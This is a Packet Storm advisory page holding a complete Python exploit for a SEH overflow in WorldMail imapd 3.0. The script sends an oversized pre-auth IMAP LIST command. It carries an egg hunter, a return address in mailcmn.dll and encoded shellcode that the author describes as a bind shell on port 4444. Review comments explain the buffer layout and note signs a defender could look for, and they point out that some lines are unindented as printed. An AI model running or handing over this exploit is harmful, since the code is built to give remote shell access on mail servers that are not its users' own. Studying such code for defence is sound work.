WorldMail imapd 3.0 SEH Overflow

2012-01-13T00:00:00
ID PACKETSTORM:108625
Type packetstorm
Reporter TheXero
Modified 2012-01-13T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
import sys  
import socket  
  
## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)  
## Tested on: XP SP3 en-us  
## Author: TheXero  
## Website: www.thexero.co.uk  
## http://www.nullsecurity.net  
  
## Check for parameters  
## NOTE(review): this is a Python 2 script (print statement). The two lines under the
## `if` are not indented in this listing, so it does not parse as written; the code is
## kept byte-identical here and only annotated.
if len(sys.argv) != 3:  
print "Usage: " + sys.argv[0] + " 127.0.0.1 143"  
quit()  
  
## Assigns the parameters  
## target: IMAP host; port: IMAP port (the usage text suggests 143).  
target = sys.argv[1]  
port = int(sys.argv[2])  
  
## Sets up the socket  
## Plain TCP, no TLS; the whole request below is visible on the wire to any  
## network monitor.  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
## Sets the variables  
## char: single-byte delimiter placed at both ends of the buffer (see the  
## assembly below). Why "}" is required is not explained on this page.  
char = "}"  
## nseh: overwrites the "next SEH record" pointer. \xeb\x06 is an x86 short  
## jump forward by 6 bytes, padded with two NOPs.  
nseh = "\xeb\x06\x90\x90"  
## seh: overwrites the SEH handler pointer with an address inside mailcmn.dll  
## (little-endian 0x10013B4E). The author's comment lists only a POP ECX at  
## that address; the full gadget is not shown here. Mitigations that validate  
## handler addresses (SafeSEH/SEHOP) or block non-executable stack pages (DEP)  
## are what this overwrite relies on being absent for the loaded module —  
## presumably the reason a non-OS DLL was chosen; not confirmable from here.  
seh = "\x4e\x3b\x01\x10" ## 10013B4E |. 59 POP ECX mailcmn.dll  
## NOTE: this value is never used — `buffer` is reassigned below.  
buffer = '\x90' * 8  
## shellcode: an opaque encoded payload prefixed with the 8-byte egg tag  
## "T00WT00W". The egg hunter below searches memory for that tag. The payload  
## is described by the author as a bind shell on port 4444; that is not  
## verifiable from the bytes as printed. Detection: a bind shell means a new  
## listening socket opened by the mail daemon process.  
shellcode = ("T00WT00W" ## Bindshell port 4444  
"\xbd\xe8\x39\x05\xa5\xdb\xdb\xd9\x74\x24\xf4\x58\x29\xc9\xb1"  
"\x56\x31\x68\x13\x03\x68\x13\x83\xc0\xec\xdb\xf0\x59\x04\x92"  
"\xfb\xa1\xd4\xc5\x72\x44\xe5\xd7\xe1\x0c\x57\xe8\x62\x40\x5b"  
"\x83\x27\x71\xe8\xe1\xef\x76\x59\x4f\xd6\xb9\x5a\x61\xd6\x16"  
"\x98\xe3\xaa\x64\xcc\xc3\x93\xa6\x01\x05\xd3\xdb\xe9\x57\x8c"  
"\x90\x5b\x48\xb9\xe5\x67\x69\x6d\x62\xd7\x11\x08\xb5\xa3\xab"  
"\x13\xe6\x1b\xa7\x5c\x1e\x10\xef\x7c\x1f\xf5\xf3\x41\x56\x72"  
"\xc7\x32\x69\x52\x19\xba\x5b\x9a\xf6\x85\x53\x17\x06\xc1\x54"  
"\xc7\x7d\x39\xa7\x7a\x86\xfa\xd5\xa0\x03\x1f\x7d\x23\xb3\xfb"  
"\x7f\xe0\x22\x8f\x8c\x4d\x20\xd7\x90\x50\xe5\x63\xac\xd9\x08"  
"\xa4\x24\x99\x2e\x60\x6c\x7a\x4e\x31\xc8\x2d\x6f\x21\xb4\x92"  
"\xd5\x29\x57\xc7\x6c\x70\x30\x24\x43\x8b\xc0\x22\xd4\xf8\xf2"  
"\xed\x4e\x97\xbe\x66\x49\x60\xc0\x5d\x2d\xfe\x3f\x5d\x4e\xd6"  
"\xfb\x09\x1e\x40\x2d\x31\xf5\x90\xd2\xe4\x5a\xc1\x7c\x56\x1b"  
"\xb1\x3c\x06\xf3\xdb\xb2\x79\xe3\xe3\x18\x0c\x23\x2a\x78\x5d"  
"\xc4\x4f\x7e\x70\x48\xd9\x98\x18\x60\x8f\x33\xb4\x42\xf4\x8b"  
"\x23\xbc\xde\xa7\xfc\x2a\x56\xae\x3a\x54\x67\xe4\x69\xf9\xcf"  
"\x6f\xf9\x11\xd4\x8e\xfe\x3f\x7c\xd8\xc7\xa8\xf6\xb4\x8a\x49"  
"\x06\x9d\x7c\xe9\x95\x7a\x7c\x64\x86\xd4\x2b\x21\x78\x2d\xb9"  
"\xdf\x23\x87\xdf\x1d\xb5\xe0\x5b\xfa\x06\xee\x62\x8f\x33\xd4"  
"\x74\x49\xbb\x50\x20\x05\xea\x0e\x9e\xe3\x44\xe1\x48\xba\x3b"  
"\xab\x1c\x3b\x70\x6c\x5a\x44\x5d\x1a\x82\xf5\x08\x5b\xbd\x3a"  
"\xdd\x6b\xc6\x26\x7d\x93\x1d\xe3\x8d\xde\x3f\x42\x06\x87\xaa"  
"\xd6\x4b\x38\x01\x14\x72\xbb\xa3\xe5\x81\xa3\xc6\xe0\xce\x63"  
"\x3b\x99\x5f\x06\x3b\x0e\x5f\x03")  
  
## Calculates the size of junk depending on the shellcode  
## junk + shellcode is always 769 bytes, so nseh lands at a fixed offset  
## regardless of payload length. The filler is a run of "A" (\x41), which is  
## an easy pattern for an IDS or the IMAP server's own logging to flag.  
junk = "\x41" * (769 - len(shellcode))  
  
## Egg Hunter  
## Small position-independent stub run after the SEH redirect. It probes  
## memory pages with the `int 0x2e` system call (\xcd\x2e) and compares  
## against the 4-byte tag \x54\x30\x30\x57 ("T00W") until it finds the  
## payload placed earlier in the same request.  
hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"  
"\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")  
  
## Assembles the buffer  
## Layout: "}" | A*n | T00WT00W+payload | nseh | seh | hunter | "}"  
buffer = char + junk + shellcode + nseh + seh + hunter + char  
  
## Connects  
## Sends one unauthenticated IMAP LIST command whose argument is ~800 bytes  
## of binary. No login precedes it, so a pre-auth LIST with a long, mostly  
## non-printable argument is the observable on the wire.  
s.connect((target,port))  
## The server greeting is read and discarded.  
data=s.recv(1024)  
s.send("a001 LIST " + buffer + "\r\n")  
s.close()  
  
  
`